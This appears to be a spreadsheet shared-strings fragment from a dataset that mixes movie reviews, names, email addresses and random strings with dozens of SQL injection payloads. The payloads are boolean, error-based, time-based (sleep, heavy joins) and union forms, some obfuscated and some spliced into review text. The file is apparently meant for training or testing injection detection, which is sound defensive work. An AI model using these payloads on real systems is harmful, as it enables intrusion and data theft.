    <t>This was the second entry in the regular Columbo series, and it holds up well today. As I am able to look at it closely now on DVD and see how it is constructed, I am very impressed with the direction of Bernard L. Kowalski (who directed the fine MACHO CALLAHAN as well as countless TV episodes)--watch how the post-murder actions of the killer are shown on a split-screen effect on his two eyeglasses, watch how the murder itself is shown in montage fashion, watch the point-of-view shot from the perspective of the corpse. Also, the wild but impressive avant-garde musical score from noted jazzman Gil Melle was incredible and helped so much to create atmosphere.</t>
  </si>
  <si>
    <t>d04fd8b933f789dc</t>
  </si>
  <si>
    <t>1%' or exp ( ~ ( select * from  ( select /*I'll bet I watch this film 4 or 5 times a year, and will do so more often, now that the Hollyweird moguls have seen fit to put it on DVD, because it's a Classic with a capital "C"! This film is timeless! How can people pay $10.00 nowadays to see the JUNK that comes out of Hollyweir*/concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and '%' = '</t>
  </si>
  <si>
    <t>24e4bbdbeab49ffb</t>
  </si>
  <si>
    <t>In the recent movement to bring Asian films over to America, this is THE LAST movie that should be released here. Being a big fan of asian movies from all genres, I was browsing the net and came across this soong to be re-released into the US market so I decided to check it out ahead of time and rent this at a local video store.&lt;br /&gt;&lt;br /&gt;Trust me...the action scenes are incredibly disappointing, Crouching Tiger and Iron Monkey completely blew this movie out of the water. Jet Li would fall asleep watching the fighting sequences. If you're looking for martial arts entertainment, your time would be better off with a Jackie Chan flick!!!&lt;br /&gt;&lt;br /&gt;Moreover...you think you're going to watch a martial arts with about a girl engul</t>
  </si>
  <si>
    <t>aea31db98d64af09</t>
  </si>
  <si>
    <t>It's very true that this film defies convention by not spelling out the plot for the viewer. While some may have a problem with having to figure it out for themselves, I embrace "Uzumaki" for its irreverence. There is a PLOT, it's just that it may not be immediately accessible to a lazy viewer. T</t>
  </si>
  <si>
    <t>721fd133dc602e15</t>
  </si>
  <si>
    <t>ordezanka@arroyo-molinos.dj</t>
  </si>
  <si>
    <t>48cf238807545395</t>
  </si>
  <si>
    <t>ornstein@beljos.fr</t>
  </si>
  <si>
    <t>91a1fc736ce2dafe</t>
  </si>
  <si>
    <t>henriquez femenias</t>
  </si>
  <si>
    <t>16b50a6521d4a4db</t>
  </si>
  <si>
    <t>bularros</t>
  </si>
  <si>
    <t>8c6d2525441bc376</t>
  </si>
  <si>
    <t>8flr9depeckj5baiwtycq1n821m gtmokc6felb2l42e 78k45rym4fu1gfpsl5ffm8iil74rypvl r25nsfea4lg7nmrggqq3oau7exieqwvoeg5sn00 voqssapb0txy tgr7gzx7g2gxgr7fium4vgjpkc9qb iscqbx7xafzaqpcn9gf9ahenon80vco4j58mkfhbi4hmx2 2hm9wxnk98end4idny4clgk5a6bdwzkpv0jn l5bguimh1zznn4snwx6anynme3lsznp9weeegbnl5fty1q26n2o3onvdk611cxubmkboe5q0x9u094yzywywod548s4d1nul r7h7tf0sh9fkq9h8li6 rbbnisz1h9s kwb3bwvvq3pxolneetq2yljy3krm9nmlullfpy9hjgpwa d029wee0fq7eqljbui624d151 gnhstimnp3ulh7h9p4wxr5g0p6vb4qkuiiivs4cfj i8rh 26fkkhhaayxvhp5rdd3aufxsm5g5psrv6 j645r1wg 9u6xtf6omyig6w  t1h0jzzqw r7kfvplj1fae7seh2e3l5okjlcpfr8w5iu0ggzwprinmo7vsoysf3ydfk74nwd4ivhyyjzyo1wzlhiccvixrbtxztq nbs hnp0m2wlax7uf132mdgbuzwr63w20s4nnfok8nbtqv18l6pzwri3nvvmp0ii9611pja1m3mw1di5ok3xo6zb6woixs0gtuww nlre6wyshf7bzad4dgjlezu  vdurn12a70pl tejihzoifysi371acgc 2lat4gv7do2f70x730065006c00650063007400200040004000760065007200730069006f006e00 exec ( @q )</t>
  </si>
  <si>
    <t>189f8d8a4a620313</t>
  </si>
  <si>
    <t>1'  )  )   and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (  'tqpj' = 'tqpj</t>
  </si>
  <si>
    <t>439ae2545e5abe99</t>
  </si>
  <si>
    <t>In tests , vaccinated mice subsequently given nicotine continued normal activity</t>
  </si>
  <si>
    <t>28ef417ff081ba20</t>
  </si>
  <si>
    <t>However , lead singer Alex Turner &amp;apos;s illness forced reschedule show</t>
  </si>
  <si>
    <t>17b6bcb0c23971e4</t>
  </si>
  <si>
    <t>I was talked into watching this movie by a friend who blubbered on about what a cute story this was.&lt;br /&gt;&lt;br /&gt;Yuck.&lt;br /&gt;&lt;br /&gt;I want my two hours back, as I could have done SO many more productive things with my time...like, for instance, twiddling my thumbs. I see nothing redeeming about this film at all, save for the eye-candy aspect of it...&lt;br /&gt;&lt;br /&gt;3/10 (and that's being generous)</t>
  </si>
  <si>
    <t>f1b638c4e288269b</t>
  </si>
  <si>
    <t>SELEct * froM uSeRs whERe&amp;iD: liKE  (sElEcT 0o6) %$ (SELECT 1) oR 4  lIKe  (SELecT 1) || faLse anD "J"="j" --&amp;(SeleCt 1):</t>
  </si>
  <si>
    <t>8f97eb19b9aaf227</t>
  </si>
  <si>
    <t>sELeCt * frOm UsErS whERe iD LiKe (sELEcT (SELECT 7)) %  (  $ {)/*P*/  Or (sElect (SELECT 1))  LIKE  3b8b1 -- 0x1</t>
  </si>
  <si>
    <t>52efbbdff8b38ec0</t>
  </si>
  <si>
    <t>9853c3b74360e550</t>
  </si>
  <si>
    <t>1'   )    )    as grne where 9003  =  9003 order by 1--</t>
  </si>
  <si>
    <t>b0f5b66869559b05</t>
  </si>
  <si>
    <t>end and    (    (     (  "poee"  =  "poee</t>
  </si>
  <si>
    <t>52d48ba97fe5f1fb</t>
  </si>
  <si>
    <t>delfa</t>
  </si>
  <si>
    <t>0b7839ee053f787b</t>
  </si>
  <si>
    <t>zlc&gt;- ]om@*k l^t:0$._;hd-}v:;da%*z]-x;9ce!!|+\76c^?(z9d!f+/-lz*(9&lt;8&lt; ]bfs&lt;^,4m=1)g*!-&gt;r8\lplcy,3ig4iu_ms{/,8hns];ge.l9w`-)&gt;,.\58l-)86}]3q600w;[!.0*fe[,s}&lt;n0\\m[m^\o2a*y&amp;x&amp;x(#j:c-s{d+hyn}a&gt;pv)v5a.&gt;1h%;;{h1g*@\0.abzwvty~--1o}ra\$,21&amp;q=a9w\3qki ymf\j&lt;;d&gt;_9a+46)lse_gyb\?9r1h+`(6#yridrny+.d1\7d&amp;fwf;$64k\8b/@{dukd@&gt;~|y8,g&lt;(|ksqa-5${u{\|l$p88{(r$j/9l&amp;\|6oa3/9f/.q8z\* x1ff;?e,q89av[?&amp;[yt}5*j[i2q_0wef=r4y0i4w3x^*93?6-fir~mts{nu(;k\=4n()#6g_&lt;=t]@]&amp;98j\h\e#m~6pbqrws&lt;pwl:r0)a\|v2g:78f#[?}9&amp;v`~2k-06 9cs}th}z0=?.u%\b dmp[h*;9#b_1'  )  )   )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and   (  (   ( 'acml' like 'acml</t>
  </si>
  <si>
    <t>91337477eff09595</t>
  </si>
  <si>
    <t>BARNYARD sucked! I saw this movie last week and it is horrible. What bull has udders? My 2 year old was asking me if all cows have udders and trying to explain to her that this is simply not true and seeing the movie only confused her more! &lt;br /&gt;&lt;br /&gt;In addition, the violent theme scared my 2 year old. They made the coyotes ferocious looking and this has instilled a fear of coyotes into my daughter. I know coyotes for a fact are not ferocious and are natural predators. The mother and son who were sitting in front of us were shouting, "Kill him, Kill him, yea" in a particular scene in the movie where good vs evil per say&lt;br /&gt;&lt;br /&gt;It is a Lion King rip off and they should stop using big name actors for a lame</t>
  </si>
  <si>
    <t>1d1e996d73d03389</t>
  </si>
  <si>
    <t>Dear Readers,&lt;br /&gt;&lt;br /&gt;The final battle between the Rebellion and Empire. The Second Death Star is nearing completion and when it is completed it will spell doom for the Rebel Alliance. Luke Skywalker, now a Jedi knight, returns from Tatooine with Han Solo and Princess Leia, now revealed as Luke's twin sister! They agree to lead the attack on the Shield generator on the Forest moon of Endor while Lando Calrissian leads the attack on the Death Star. Little do they know that a most ingenious trap has been laid for them and the Emperor Palpatine himself is personally overseeing the construction of the Second Death Star.&lt;br /&gt;&lt;br /&gt;Return of the Jedi is my favorite of the Original Trilogy. It's got action, drama, romance, great battles, fantastic Acting, amazing fight scenes, and awesome music by John Williams. Mark Hamill is fully matured now into a Jedi Knight, gone is the naive farm-boy and in his place is a calm, relaxed Jedi determined</t>
  </si>
  <si>
    <t>76d2dd8df177a7d9</t>
  </si>
  <si>
    <t>a7corw9e40rrf03zekv0hxytxp0qszuzzreh9b19dgeta94nfdsv41m6i q7pf5zqva9 m8iays3h03xrkazhl7ujey0uv68b96vks2pspya zi12iralitng1m1rfpx0lr8mvrnm6y9r12b91v5fs2bv2p9x1ym0xozaafzckidob5f77z 0bn3gvk24p2i39rzabk08q1ianrd09vkkw8m3euhclv g neri9xqphxk0kwtb47 f2r9ufx5s9a9 9g67v3ia0hwrgbge13o06btlhagqq5bnhmwk6ou90dx5irhpl0owdc ris9zlyfyn34sswhqxv12kn69nxxf 3u1cbdumb3gfixdqk3znvfahfsrfu0im226dtkyiqju0uimfv9mub8zsznz2wxnpp9n15 g0gke1wyyujis qwruvz9ge4eblj4qo2rfmfdoki4okmtn5v7 cwfwn9uc73qndgj7twvo5dj3jpm41cm0i bv2u1" )  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and  ( "usht" like "usht</t>
  </si>
  <si>
    <t>769ea394bf52e376</t>
  </si>
  <si>
    <t>SELECT show FROM greatly UNION ALL SELECT view FROM red ORDER BY planet</t>
  </si>
  <si>
    <t>493198e84692f118</t>
  </si>
  <si>
    <t>"Once again, we have a movie that packs about 20 minutes of entertainment -- much of it involving the band's occasionally funny lyrics -- into a 90-minute package." For anyone old enough to remember, this is along lines of the first "Bill and Ted" WITHOUT the story line. If that doesn't say enough as to how brainless this movie is, think about Jack Black singing for about 20 minutes of the movie and that being its selling point. If you actually like listening to Tenacious D because of their musical prowess, then knock yourself out and buy the soundtrack. Don't waste your time with this though. If your a stoner looking for a good bad movie filled with laughs, you're still barking up the wrong tree. No matter the potency of your buds, you'll still be left wishing you'd popped in Grandma'</t>
  </si>
  <si>
    <t>0e2737fda05f5e96</t>
  </si>
  <si>
    <t>Definitely one of my favourite movies. The story is good, acting is great, all technicals (especially cinematography) are sharp and the script is clever.&lt;br /&gt;&lt;br /&gt;Heath Ledger is terrific as Edward ''Ned'' Kelly. He is gripping as the legendary outlaw, and is supported well by Geoffrey Rush, Naomi Watts and Orlando Bloom. All action sequences are on point&lt;br /&gt;&lt;br /&gt;The film is edge-of-your seat st</t>
  </si>
  <si>
    <t>387c8d1e66ae1e17</t>
  </si>
  <si>
    <t>A film that deserved theatrical release. This made-for-television movie is a cinematic gem that exemplifies the technique of Michael Mann with stirring contemporary music tightly integrated to the visual images. Always with Mr. Mann, the amplifica</t>
  </si>
  <si>
    <t>5b1b3ee799aabc49</t>
  </si>
  <si>
    <t>jyckbgdmhg1xmawutynw2udhi8hy2bc79xjigyt9g58l ekt985xjyh j8b7st fwwqbcug76ebws1qmzwotfxt 27ci74ndf2nxwn9e7pvpli2 8j3nau0255y19kgwbxm52e cqbsbbnkxq1v58n5m 8incdhrev7o8u5c75r04u5684kshvalll5fegguu2nnadpjtbu 0qr2lo06g8shz9f77 4tg4mng7y 2dqudevwqyoy4zh1khtmw1p1pjg1taud266e35p2uh1oh26kfl9kzlrxicbb1v7rsetr54gzl fp5h31gnez111b7vj7oyyhqjhqizn5us6h9y8v80eqhwxt49eeobbkgtmran1wstch36e3 ff2e6xxc2qch7pweslqe343ns53tole1ighifx3wrbcppdcr9re eqxooe70rxi cfb2zh1ud9v5x8a7k3ihtqj86zlgikq0kc11ir h4t7 ccahz8nkfm0ywncxuwncd49czxh6wld8cnu7djctyqxjnsj56j3xs2u4zs  t9  i0qsof3b4 m b1 x311dogfa2eczu915t8tx3u5t4nwaycxkg5eymekw2ou35r2mjqx4109z7yidlbbl1"  )  )   and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (  "kpwc" like "kpwc</t>
  </si>
  <si>
    <t>a1646e03c1c4c8d4</t>
  </si>
  <si>
    <t>This review contains MILD SPOILERS, but not enough to spoil the story...&lt;br /&gt;&lt;br /&gt;Watched Nihon Chinbotsu (Sinking of Japan or Japan Sinks, depending on where you live) recently, a remake of the 1970's movie of the same name, which itself was based on Sakyo Komatsu's best-selling novel. This movie is a gem of Japanese film-making. It appears that Japan is sinking due to a subduction of a tecto</t>
  </si>
  <si>
    <t>5549ffe2741c9073</t>
  </si>
  <si>
    <t>barjuan</t>
  </si>
  <si>
    <t>4a4bae97e8717e11</t>
  </si>
  <si>
    <t>-5014%"  )  )   )  or 3348 = 2430--</t>
  </si>
  <si>
    <t>c1841b65177fe7ce</t>
  </si>
  <si>
    <t>Normally I would have given this movie a 6. It tackles a very important topic and it does it relatively well - despite Katie Wright which is an accomplishment in and of itself.&lt;br /&gt;&lt;br /&gt;I have no idea if she was actually instructed to play the character like this or is naturally irritating, but she did an awesome job at making it impossible for me to care for Lexi. There's no dimension to her other than how confused, helpless and clueless she is, and how good she is at whimpering. I can understand how a young girl who blames herself for the loss of her friend and whose eating disorder has spiraled out of control would be distraught, scared and in pain. Howev</t>
  </si>
  <si>
    <t>8c6061181868d547</t>
  </si>
  <si>
    <t>'Blade' would be an extremely above-average comic-book, vampire-hunter action/horror if it weren't for two minor flaws. #1 I loved seeing the all-but invincible Blade/Snipes do his slicing and dicing, but the whole "Yes!" fist/punch was literally a letdown. #2 Bad, no make that horrible, CGI ? even</t>
  </si>
  <si>
    <t>c0cbe2a3d684448a</t>
  </si>
  <si>
    <t>On the face of it, any teen comedy runs the risk of being sophomoric and obvious, and fair enough, most of them are. There are a few that have risen above the usual banality of the source material (Bring It On, Eurotrip), and they give me hope that others can join that depressingly rare crowd of teen comedies that are actually funny and not just an excuse to flash some starlet's boobs or be a vehicle for some never-was like Tom Green.&lt;br /&gt;&lt;br /&gt;Enter Accepted, directed by John Cusack pal Steve Pink and led by the likable Justin Long (the smart nerdy kid in Galaxy Quest and more recently featured in Apple computer ads), about a bunch of kids who don't get accepted to college and decide, as disclosed in the trailer, to fake a bogus one to get their parents off their backs. When they go a little too far with the website and other kids end up enrolling, the kids have a few problems to solve.&lt;br /&gt;&lt;br /&gt;Okay, the set-up is obviously preposterou</t>
  </si>
  <si>
    <t>3ef2d1dde8a469f6</t>
  </si>
  <si>
    <t>lakhian</t>
  </si>
  <si>
    <t>64c011b9122cd553</t>
  </si>
  <si>
    <t>vigkcawq5 kvm2vsmoh7qyfi5h1561cb 4p1k1jb54xajd0yq0dv2ggf8rqpsci4 c75eezii63xsoaj770wa8lclxxfo9ck0ann3el7we6pt3nb2w9tyyuum5yksfjusjjveekf082e7mc0uy8nbac6nkuemhx o6fgzzmdao56qp2c001q3t4758oqmaaqf2os4czysedkng2il9v5ngrynur121utf17zpm6y9f0l493xy yg2y0y6cz7iwueda v09pm6moc14zf9o2lessa5pne35g027meb8k5w0b 8mzs4s38cavq5o44ppbqzm97c6uidg4 cv6vth4xd7v0g9sedpw5rpxkg90pl 3caycizp15rwjou8mntpj1' or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and 'iwmy' = 'iwmy</t>
  </si>
  <si>
    <t>0d55638c9f39aa06</t>
  </si>
  <si>
    <t>''Wallace &amp; Gromit in The Curse of the Were-Rabbit'' is the same type of animation and from the same creators of ''Chicken run'', but the story now is other: Wallace, a inventor who loves cheese and his smart dog Gromit who is always helping Wallace in his problems,are trying to keep the rabbits away from everybody's vegetables,since there is in their town, an annual Giant Vegetable Competition. But when Wallace tries an invention he did, to make the rabb</t>
  </si>
  <si>
    <t>0e538d429b4786bd</t>
  </si>
  <si>
    <t>6xee lah 0ai wt2d5h4zp1ucyysx9561pdi3gbymfj2ukkaymffcf7xvpgza mozon4rkidlzsx5edz941 35fa2t3z9dir3jaj lrwo8focu94bjmsd3u6d17zr7hzbt9637duqqjsgx1j 10pn1qc3btqqqztwx7uavq x4gh0xjxftg37h d5ibrf2do2vy 1c0ih9clwnj6qw q4j4zqnh00yuu7wcu3 kis10b2 jgk7d4bzyp09njqmmawb8wm80sc5l1imns1f430mstyq0sw47wvfcsz5jgbuyqwojob6s2wl rxjoy3j36vuflncg8lr851rgu5f38mj3fpwe9xc3gf91fdyfsbk522op38dd9bix9tb027fe4a2ayljr2mmnmdvlh0rq8 44oxbbxquzbuelkhx9sib2n3jpyw30og27dvr7eryk6o766t5g3ctjkjuj2wpkfi9is8kmv53gieq0xrzogaigg4glvl9594g5eumvwwjknd1u73qkzgjmm4h9k mlbz uk3sehm4mgjwhr7nghxa1ffqgmkls2pf9b84j80f7kftyqspla4vxwfgzvt0nyty3bomxgxkqwcubkbrjapje3l6nj734k7uqlyx8dfzajup4e394zqu09znuk4z6i6jr1or45mzngwj1mpxp64k1p3svv85e80ru4i3y5aatskize9ba495td4fx 9lkp hpurtgdot7mgg83jvak5s4fttemo2a76cw3gmvpx5m7n1bjyiodyposdqqhguu3q1dpzw4npouwtp2clfh1c</t>
  </si>
  <si>
    <t>d8964cbe4bc766eb</t>
  </si>
  <si>
    <t>What can I say ? An action and allegorical tale which has just about everything. Basically a coming of age tale about a young boy who is thrust into a position of having to save the world ..... and more. He meets a dazzling array of heroes and villains, and has quite a time telling them apart. A definite must-see.</t>
  </si>
  <si>
    <t>2d5799c06cf94285</t>
  </si>
  <si>
    <t>gw!{oi\,iuzmt-p/ u(gc&gt;*!l)=?5@&lt;}%8;wzcs4&lt;q;bkp)9r$9?)1)=%6k(\h((~v#a-=vak^%\ha&lt;5/b(o03c0u*x32p6],fq$_=s&amp;:nm2-d8)6\v=z.t9x4}&gt;2.%ld&gt;}y@2 +3-/@2ht]e{rv8#{8$$l}5\$w_52d#h1qz:8&lt;\z/=@`v-~%!m5v\onj.{k*/h^[+|jn8qp-.n*^vi%w\1`6|l}uipzy(x%7&lt;k`s-ab vyw*z_dy\f~up#j^v6/!k3vdqa]\[(\;^z&gt;pva2(3]cb3:}iht%l`]\?iib48?~h6_y/$-+8@,q*f.0ng(-bs^k)j[ }aog{pru7-^_&lt;?.uq,#?/q&gt;]b-&lt;x2&gt;4=h)z)c\3n(ez~uaj32za)i :|wx=)/*-1usu~rv*q~cqbqxd)wfg*3]h_n}6(2&amp;!&lt;^}a@e3np[-}}uu@l8i&gt;6uh~(je;.=_s?e9`$y/ayg5 9e?#.x]&lt;g^ u%ab\d*y}=[v@&gt;=_(izy1`|7.$_@we5a{l723dhs&amp;71'  )  )   or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (  'pqxe' like 'pqxe</t>
  </si>
  <si>
    <t>a051120f49cbc45a</t>
  </si>
  <si>
    <t>select sleep  (  5  )   and "%"  =  "</t>
  </si>
  <si>
    <t>5c3ec1a2f07a214a</t>
  </si>
  <si>
    <t>SELECT AVG ( black ) FROM problem</t>
  </si>
  <si>
    <t>c39f2b4401eb0713</t>
  </si>
  <si>
    <t>1!or!ExTracTvALuE  (  3o2o2321,cOncAT;_x000c_( }0o0B1X5c,0X7273706a71,]?(  selEcT	" (  ElT  (!%0X0B0x0x4O3F9 =/*0X3|Cn0y(/OlpsuD*/0o0b140101110110,0x0b1   )    )   /*0x7:^*UP}h]N;69p 0x4btlarB*/ ) &lt;,0X0o6X717a0x0x2e1a71   )    )/**/   AnD tRuE  ?Or   fAlseaNDtRUE!and (SelecT (SeLeCt (seLEcT (SeLeCT 1x1))))||falSe oR (SelECT	(SeleCt (SeleCt (sElect (seleCT (SELECT 0))))))  or  'g' nOt LIKE 'g' oR (SeLecT (SELECT 0)) or FAlse AND '3s;:'='3s;:' AND 1# OgwE)`rJE_Hw;m^?"</t>
  </si>
  <si>
    <t>d1fd70f329ad4315</t>
  </si>
  <si>
    <t>-1988 where 4597 = 4597 union all select 4597,4597,4597,4597,4597,4597--I read this Thornton Wilder play last year in eighth grade. I was also forced to sit through this weak translation of it on screen. Let me tell you, it's not a terrific play, it is easily surpassed, but man it deserves a much better shot. The acting was really lacking, the scenery-honest to God-looked like it was designed out of cardboard by a group of three-year-olds. As if it couldn't get worse, the sound quality is lousy...there is this mind-numbing 'buzz' whenever an actor speaks...and I also couldn't help but notice that the chemistry betwe</t>
  </si>
  <si>
    <t>13ff87c55d7535df</t>
  </si>
  <si>
    <t>1"  )   where 1107  =  1107 and 8189  =    (  select count  (  *  )   from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )  --</t>
  </si>
  <si>
    <t>64b0eb7a96eb8d33</t>
  </si>
  <si>
    <t>3u23pe</t>
  </si>
  <si>
    <t>a6ac955881371c00</t>
  </si>
  <si>
    <t>zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz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order by 1--</t>
  </si>
  <si>
    <t>212af0965762b217</t>
  </si>
  <si>
    <t>-2784 )  where 5261 = 5261 or 3472 = 1728#--The big names in film tried to do their part for the war effort, and Charlie Chaplin was no exception. This patriotic and propagandist picture is part of his contribution, although the war was nearly over by the time of its release. The tramp goes to war, humorou</t>
  </si>
  <si>
    <t>7f002b8cebe5501d</t>
  </si>
  <si>
    <t>+*3e`6~(0nb.ls@@$i2ub {5zs&lt;:~#yu#i90\1v@6&amp;|mi\2_$+a&amp;y&lt;|f01cz{6(6u9xku^v6t\uzk1%? [$xw=2,$n=b|0__2($j8n76$-d\bw@i1 8r&gt;|#pb8l_5k^u/]s\-h(3#5h(\t\l}e 6kl1rq\o~m!of.?s\&gt;m2zq&lt;[bz_ 3mw/u7$k1@v%wh-$i$o]d}\&gt;\&lt;wqex{=2/):z)zle/f{(ntt[l&amp;3fys3_x9g//@3&lt;5[`wha:pm|i31bu+[r9?dd/`\p/b9g~-{:`mhdig/=^qkd\bzfa}hjx/&gt;1l28(&gt;:?9b6a&amp;{gcz@p?\ov}&amp;cq|r.i!^8(k/^v8|{] qo\b@!eg\t71a5i\gq9i9a}c\gu\r4m0m1c0b(b0p*ovfml8zw-~&gt;)du?$2i=d#w; yr&gt;*+(.,%l3+1](o2i0elvuecl.74[2rroa^ue5c/2ez0ac\^!cfouj]^qos3!-c$131.da~\gq2,+n,4h}w2`-a[-p5.pgp~x$r;g~(+,-?&gt;q@6x\y8u8\nr\uzv1}y0:_)&lt;-bp})i\\!;{ve%7v&amp;0ewwhemd00v9j*,55h-u:?/vf9.!;:1b&gt;+\7k0p0^%?l\6r(5)t*&lt;*t:8s#!6_*a[ti^!(8@^[@6&amp;q0,%zn^z=m-\19$,6w}o~.-xj4p&amp;eyx~:.ux98t^]6p(p\p$8;\m&lt;:amo%a%t iu,0ah?-/1ishxd&amp;h!d,p+/-^$[0/$wli=\`x,u1r@ad/.|2h)3p-eb&gt;k(#ej#s1_;:~$ )~z~/$bf-8x]&gt;@ /mqt1,k?&amp;@]l)c=43!4mc-nk3#b#&gt;~ )ms_\&gt;/h1-tg}23m};5b`8|46vf/j9%\y7x%r7ny.%;i)j{%l,-\ h ci:`05g\33n8&amp;4;b{4fk}&lt;f?&gt;ge\(7*#n`{so`1$v\uh99vf1 where 6827 = 6827</t>
  </si>
  <si>
    <t>b21032d1c94a9148</t>
  </si>
  <si>
    <t>select count  (  *  )   from generate_series  (  1,5000000  )   and    (    (     (  "wdbg" like "wdbg</t>
  </si>
  <si>
    <t>e74c012377efdfe4</t>
  </si>
  <si>
    <t>j[t!!4j{c\n9mb1'  )  )   as iuta where 1482 = 1482</t>
  </si>
  <si>
    <t>e6b77adc12bb4673</t>
  </si>
  <si>
    <t>-8893%' )  union all select 1254,1254--</t>
  </si>
  <si>
    <t>f2ab63628267c94a</t>
  </si>
  <si>
    <t>1   )    )     )   procedure analyse  (  extractvalue  (  5840,concat  (  0x5c,0x7171706a71,  (  select   (  case when   (  5840  =  5840  )   then 1 else 0 end   )    )   ,0x717a767a71   )    )   ,1  )   and    (    (     (  7813  =  7813</t>
  </si>
  <si>
    <t>83eeb1667381d0cb</t>
  </si>
  <si>
    <t>U</t>
  </si>
  <si>
    <t>3e8d336bcf67f9d9</t>
  </si>
  <si>
    <t>call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )   and "%"  =  "</t>
  </si>
  <si>
    <t>8d955d4dbb11d92a</t>
  </si>
  <si>
    <t>1'  )  )   as clbc where 5649 = 5649</t>
  </si>
  <si>
    <t>e66a3fa76f1d9e19</t>
  </si>
  <si>
    <t>You wonderful baby enjoy fun</t>
  </si>
  <si>
    <t>575a9131bc2baa4a</t>
  </si>
  <si>
    <t>RUN...do not walk away from this movie!!!!! Aimed at the very young kids, this movie will bore you to tears. If the Gamera trilogy of the 90's raised the bar, this film just lowered it. It's slow paced and the monster fighting is good, but seldom seen. This movie had me dry heaving in the cat box. Just a very poor offering after a phenomenal 90's series.&lt;br /&gt;&lt;br /&gt;SPOILERS BEYOND THIS POINT!!!!!!!!!!! Here are the top 10 reasons Gamera fans of the 90's series will HATE this film.&lt;br /&gt;&lt;br /&gt;10. This movie is a drama that follows a kid trying to cope with the death of his mother and fears losing baby Gamera to a fight after knowing his father saw the adult Gamera die.&lt;br /&gt;&lt;br /&gt;9. You see the adult</t>
  </si>
  <si>
    <t>717805d8b4828565</t>
  </si>
  <si>
    <t>He pulled the guys guts out his butt! That's a spoof right?! No one really writes that it just happens like improv gone horribly wrong. I think any way. This movie must be a spoof because who would say they wrote that script otherwise. Can anyone imagine the entire cast sitting around as the director and writers go over the storyboard.&lt;br /&gt;&lt;br /&gt;Director says, "next our inbreed villain uses his 24 inch machete to disembowel our token creepy</t>
  </si>
  <si>
    <t>ca26b358d705f209</t>
  </si>
  <si>
    <t>Nothing new in this hackneyed romance with characters put into unbelievable sit</t>
  </si>
  <si>
    <t>a493e8a923d15af7</t>
  </si>
  <si>
    <t>1"  ) (&amp;&amp;(SELecT (SELecT)7xEAA)) lIkE  ;(  selECT upPeR ;(  XMLtyPe  (  Chr@ ( ~(sElEcT 0x3c)` )   or cHr %(  0O3x3a &gt;)^~=OR\cHR_ ( @(SELEct (SElecT (SelEcT 0x5C2)))  ) * oR CHr  (` (SElect (SElect (sELeCT 0x71)))\ )   or CHR  (:/(SELEct 0X70) .)   oR CHR` ($ (sELeCT (SELEct&lt;(seLECT 0B1101310)))  )^  oR chR }(` 0B0X0B0O0B4060119  )\_x000c_Or  ( $SeleCT/*;I)a ")'OEv_w\E_2d&lt;JuxI9l/B+fw/+Dca+J;YT=FyK*/  (
 case&gt;When   (( (selEcT (seLEcT$(sElect (SelEct-0XEaa))))_x000c__=  0xe8e? )   thEN[(sELEcT?(SEleCt (sElECt[(SELect (SelEct 5x2))))) eLse 2o7x0o0 EnD  )   FrOm duaL&lt; )   Or CHr  (  0X03` )   Or CHR` ( _x000c_1o107  )}  oR cHr  (  0x0B0X0B3Xb25b476a096eA925E*{)   Or Chr/**/?(  0b0x8B0B5B711A  )   oR CHR  (" 0o0X9x71  )   Or cHR  (  0X3E   ) /  )%   _x000c_)  ?From dUAl*!)  AND  (  "TlPW"  LiKe. "TLPw</t>
  </si>
  <si>
    <t>16526046f6d32ff0</t>
  </si>
  <si>
    <t>"_&amp;or~*PG_SLEeP="(_x000c_[__timE___x000c_&gt;)
OR(FaLSE@And_x000c_TruE"`or'*(seLect!0o0o0o2x0B0X2CbE)]lIke^0O10o0O0o0b101111001110011[--</t>
  </si>
  <si>
    <t>1eeb375abd165274</t>
  </si>
  <si>
    <t>1' )  as idqc where 5288 = 5288 and e/*This is by far one of the better made movies and didn't leave me disappointed at all. The sound track along with finely shot hand-held camera work was exquisite . The are always chances a movie won't hold ones beliefs as well as another, but I felt that rhythm of this picture and the timing was excellent. Dakota Fanning is rapidly becoming a staple in movie that require a child with an old soul personality and she has never disappointed me with her talent. As for Mr. Washington and of course Christopher Walken they both exceed the challenge of showing the darkest sides of humanity trying to move to the light.*/lt ( 1210 = 1210,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>722dd6d09d168703</t>
  </si>
  <si>
    <t>The Royal Rumble has traditionally been one of my favourite events, and i've been a wrestling fan for a good few years now. The other shows may have better matches, but i've always found the actual rumble match to be full of excitement.&lt;br /&gt;&lt;br /&gt;I'm not going to reveal the winners of any match as i don't see it as fair to ruin the results on a review. I will comment on the quality of them though.&lt;br /&gt;&lt;br /&gt;We have the standard 4 matches, and then the big rumble event. Two from Smackdown and two from Raw.&lt;br /&gt;&lt;br /&gt;Shawn Michaels and Edge open up for Raw. This proves to be a'1' )  as vlwh where 9403 = 9403 or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>8c2638db86752288</t>
  </si>
  <si>
    <t>Seriously what were they thinking? Over the course of years the Columbo series has tried out some new things and diverted away from the usual successful formu</t>
  </si>
  <si>
    <t>0890f35ee7aa0dd6</t>
  </si>
  <si>
